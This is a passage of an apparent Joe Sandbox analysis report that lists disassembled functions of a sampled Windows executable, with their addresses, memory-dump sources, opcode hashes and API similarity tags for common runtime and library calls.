                                                                                                            • Instruction Fuzzy Hash: C5F0A432B1878265E660BF24E8803A9A3B5BF4C7D4FC00135E9DD87789DE6CD5849A14
                                                                                                            Function 00007FF7390C8438 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1175261203-0
                                                                                                            • Opcode ID: 94b6ca22df3143385c2646d0182ab26cc17e09715b19d9ecf0578cc894803833
                                                                                                            • Instruction ID: a6548c7ba2bb69f344b67bb11957f5e07e6cf0a6ebb1fd856af0fe2213c6de89
                                                                                                            • Opcode Fuzzy Hash: 94b6ca22df3143385c2646d0182ab26cc17e09715b19d9ecf0578cc894803833
                                                                                                            • Instruction Fuzzy Hash: 32F06272A1998261F660AF10E8513EAA375BF8C784FC00131E9CD86659DE2CD644DB20
                                                                                                            Function 00007FF7390D999C Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1173176844-0
                                                                                                            • Opcode ID: 9181b5449a08cd9cbbcd7692beca2281eb77e3a075ddbf10d2aca2b887a17d7c
                                                                                                            • Instruction ID: 14a570ee87ffb1acfa5bce93a597beddd0e7e03e39a30d6b7575ded3421f85a1
                                                                                                            • Opcode Fuzzy Hash: 9181b5449a08cd9cbbcd7692beca2281eb77e3a075ddbf10d2aca2b887a17d7c
                                                                                                            • Instruction Fuzzy Hash: B1E0EC02E1A10B25FD687E6A29561B5C0A60F05770E9C1B30EDFD053C3AD1CE851A130
                                                                                                            Function 00007FF7390E46E4 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 485612231-0
                                                                                                            • Opcode ID: 414d1e517c1b2a9ec2ba446668577b3b95cc0989972275c948ff172d31d1cb21
                                                                                                            • Instruction ID: e4a5df0683d82559dd2234f3ba9cc409c23a647d58572b9bda4a516b1e01fb1b
                                                                                                            • Opcode Fuzzy Hash: 414d1e517c1b2a9ec2ba446668577b3b95cc0989972275c948ff172d31d1cb21
                                                                                                            • Instruction Fuzzy Hash: B3E08660E0990F62FF047FF2A444278F2B35F45B40F850434C90D56351DD2CE4C16274
                                                                                                            Function 00007FF7390DC3EC Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Alloc__vcrt___vcrt_uninitialize_ptd
                                                                                                            • String ID:
                                                                                                            • API String ID: 3765095794-0
                                                                                                            • Opcode ID: 62db63923d624c38a34d369d8445faf59d0a3b422bae8680cabb6e87fbc54574
                                                                                                            • Instruction ID: fe55a85ffbd2cda01a5af1d32d33c5bd04a4a895cdeb8fdd69f72117c8d0cad3
                                                                                                            • Opcode Fuzzy Hash: 62db63923d624c38a34d369d8445faf59d0a3b422bae8680cabb6e87fbc54574
                                                                                                            • Instruction Fuzzy Hash: 4BE01A22E0C693B1FA107F35A8820B4E2736F41350FD01631E42D822E6EE2CE006B635
                                                                                                            Function 00007FF7390D7F68 Relevance: 2.5, APIs: 2, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1284135714-0
                                                                                                            • Opcode ID: 647e1b0490c0474c9cdc47dde44763036ae28a48829b7ec174f35acca7c350d2
                                                                                                            • Instruction ID: c61aa495e0cfc8e763533b288769fc54dd68adc138b3326c38eddf6cd47b0705
                                                                                                            • Opcode Fuzzy Hash: 647e1b0490c0474c9cdc47dde44763036ae28a48829b7ec174f35acca7c350d2
                                                                                                            • Instruction Fuzzy Hash: 14013565E0C58BF9EB01BF24F8811F1AB735F14340FD44472D49D66262EE2CA045A330
                                                                                                            Function 00007FF7390E2EC4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3947729631-0
                                                                                                            • Opcode ID: 08242c9402510aaacbb855e0f4afd1eb98e83ed79ff682178dee8ec952dc1a7e
                                                                                                            • Instruction ID: 17928453a197e4f642fb52e9fca50a4dd5d1052110656a2127f2863a20344e66
                                                                                                            • Opcode Fuzzy Hash: 08242c9402510aaacbb855e0f4afd1eb98e83ed79ff682178dee8ec952dc1a7e
                                                                                                            • Instruction Fuzzy Hash: 3141B321E19E4BA2FF28FF28A450238A673AF90740FC05035D90E576D5DF3DE841A720
                                                                                                            Function 00007FF7390E836C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 3215553584-0
                                                                                                            • Opcode ID: 5dc2b5ab02e4ff4dc8f93adce1140ab100a488eeb0e6e72ef3ec2d993547501d
                                                                                                            • Instruction ID: 04bc4238e9d2822ad70839f747f534bee3adcb4148158292bb876c397765954a
                                                                                                            • Opcode Fuzzy Hash: 5dc2b5ab02e4ff4dc8f93adce1140ab100a488eeb0e6e72ef3ec2d993547501d
                                                                                                            • Instruction Fuzzy Hash: FC114C32E1CA87A6F611BF60A48017AE2B6FF40380FD40534EA8D57795DF2CE800A7A0
                                                                                                            Function 00007FF7390C93F0 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7390C6118: LoadStringW.USER32 ref: 00007FF7390C619F
                                                                                                              • Part of subcall function 00007FF7390C6118: LoadStringW.USER32 ref: 00007FF7390C61B8
                                                                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7390D84D1
                                                                                                              • Part of subcall function 00007FF7390D7858: GetDlgItem.USER32 ref: 00007FF7390D7897
                                                                                                              • Part of subcall function 00007FF7390D7858: ShowWindow.USER32 ref: 00007FF7390D78BD
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D78D2
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D78EA
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D790B
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D7927
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D796A
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D797E
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D7992
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D79BC
                                                                                                              • Part of subcall function 00007FF7390D7858: SendMessageW.USER32 ref: 00007FF7390D79D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$LoadString$ItemShowWindowswprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3230410503-0
                                                                                                            • Opcode ID: 22b3e8f01721ea17413595b621defc862c7649edc7045cded7403a795ba48c30
                                                                                                            • Instruction ID: 8b884728abec70f629f4305e978257bd3519dfb559345a18693130e48a5946a7
                                                                                                            • Opcode Fuzzy Hash: 22b3e8f01721ea17413595b621defc862c7649edc7045cded7403a795ba48c30
                                                                                                            • Instruction Fuzzy Hash: 7101D662A0868765FA207B20E4523EE92A1EF897C8FC00135FA9D4B3D3DD2CD5449B10
                                                                                                            Function 00007FF7390C37FC Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7390C3984: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7390C382B), ref: 00007FF7390C39CE
                                                                                                              • Part of subcall function 00007FF7390C3984: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7390C382B), ref: 00007FF7390C39FF
                                                                                                              • Part of subcall function 00007FF7390C3984: GetLastError.KERNEL32(?,?,00000000,?,?,00007FF7390C382B), ref: 00007FF7390C3A0E
                                                                                                            • FindClose.KERNELBASE ref: 00007FF7390C3834
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1464966427-0
                                                                                                            • Opcode ID: 177ffa92081d2d7b0acdc831f0488067a0aa1df69a46f38590587ae8e6420898
                                                                                                            • Instruction ID: 5ef1bc4e471d242bf8d80e54adc2ecc47ae023b02696e9e5bc0f7f918ec92533
                                                                                                            • Opcode Fuzzy Hash: 177ffa92081d2d7b0acdc831f0488067a0aa1df69a46f38590587ae8e6420898
                                                                                                            • Instruction Fuzzy Hash: 5FF086329182C355DB516F7561812E8A7729F06BB5F884334EAFC0F2CBCD58D0889B30
                                                                                                            Function 00007FF7390E4680 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vcrt_uninitialize_ptd
                                                                                                            • String ID:
                                                                                                            • API String ID: 1180542099-0
                                                                                                            • Opcode ID: dd6718efb1d5c2eb9453cbc86a38c62ac466f658d62c1e49b92f65f83ec2880d
                                                                                                            • Instruction ID: 5b31cbb551e84fa1f000b3a3bf8eca0a9bfd6451923d49568270e35f123ca300
                                                                                                            • Opcode Fuzzy Hash: dd6718efb1d5c2eb9453cbc86a38c62ac466f658d62c1e49b92f65f83ec2880d
                                                                                                            • Instruction Fuzzy Hash: F6E08C20D0ED0BB0ED187F3024820B8F3B22F21B10FD00A30D11E822D2AD2CE1427632
                                                                                                            Function 00007FF7390C93B8 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3015471070-0
                                                                                                            • Opcode ID: aa4befddba6ef0040b7eda380309ae693457e3dafc00a93bf9263887b1dd2939
                                                                                                            • Instruction ID: c74615e1d32a195a79870f57c070657402cbdd9288999683502a877dc6c8d641
                                                                                                            • Opcode Fuzzy Hash: aa4befddba6ef0040b7eda380309ae693457e3dafc00a93bf9263887b1dd2939
                                                                                                            • Instruction Fuzzy Hash: 2CD05E91F08607A2E620BF11E49933A83326F52B85FD00230CD8E2B7A5CE6DD512AB90
                                                                                                            Function 00007FF7390C2AC0 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File
                                                                                                            • String ID:
                                                                                                            • API String ID: 749574446-0
                                                                                                            • Opcode ID: 0b26834fbb1b7e6e0e7c3e62e29e49870c3ef04d8bc0e52205c20f23b29f7e0c
                                                                                                            • Instruction ID: 6e10823aa6c763f201dadc0ff25a79a00ea0bfb3baab6dd777ecefdc44c73155
                                                                                                            • Opcode Fuzzy Hash: 0b26834fbb1b7e6e0e7c3e62e29e49870c3ef04d8bc0e52205c20f23b29f7e0c
                                                                                                            • Instruction Fuzzy Hash: 68B0922AE1688981CA086B12D99101C5221B784B42FE80820C20EE22A0CE1DCED78700
                                                                                                            Function 00007FF7390D467C Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 1611563598-0
                                                                                                            • Opcode ID: 9cbedb16a02a1088a0d00551bded5e84dd216166944dd1c2328b4587057f3df0
                                                                                                            • Instruction ID: 4a9b6edfc2e6c1ba2966989e574b92e056d95714d7bb19d41d309cbd39aebbd8
                                                                                                            • Opcode Fuzzy Hash: 9cbedb16a02a1088a0d00551bded5e84dd216166944dd1c2328b4587057f3df0
                                                                                                            • Instruction Fuzzy Hash: C9A01130F0280AC2A3083B220C82208022A3B88A02FC088B8C80880220CE0C80EA2B20
                                                                                                            Function 00007FF7390E6B24 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292702814-0
                                                                                                            • Opcode ID: 402ce613fa7bd962a40acd938ce3a7cebfbf7a8b317b5fd956b2867e32232231
                                                                                                            • Instruction ID: f0fc7c9ac753ae464ca4342fabbc34ac54aef1362ef3cb8bdaedeb55d3008e09
                                                                                                            • Opcode Fuzzy Hash: 402ce613fa7bd962a40acd938ce3a7cebfbf7a8b317b5fd956b2867e32232231
                                                                                                            • Instruction Fuzzy Hash: D3F04F18F09E0B61FE587E66BA112B9E2B71F54B90F884430C90E472C2ED1CE4806230
                                                                                                            Function 00007FF7390E4870 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292702814-0
                                                                                                            • Opcode ID: 8bb2d0cab1606aae57c35f2d6f1fd3209e502161cdab12386304fb3f6452b931
                                                                                                            • Instruction ID: 1128542fa56424ea7bfc68ac402c49d4bd147bc1366b15fbb9c8058feeabd153
                                                                                                            • Opcode Fuzzy Hash: 8bb2d0cab1606aae57c35f2d6f1fd3209e502161cdab12386304fb3f6452b931
                                                                                                            • Instruction Fuzzy Hash: 2FF05816E08A8FA5FA687E625A41279F1A28F847E0FC84634DD2E863C2DE6CE4417130
                                                                                                            Function 00007FF7390C20D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                            Download Yara Rule
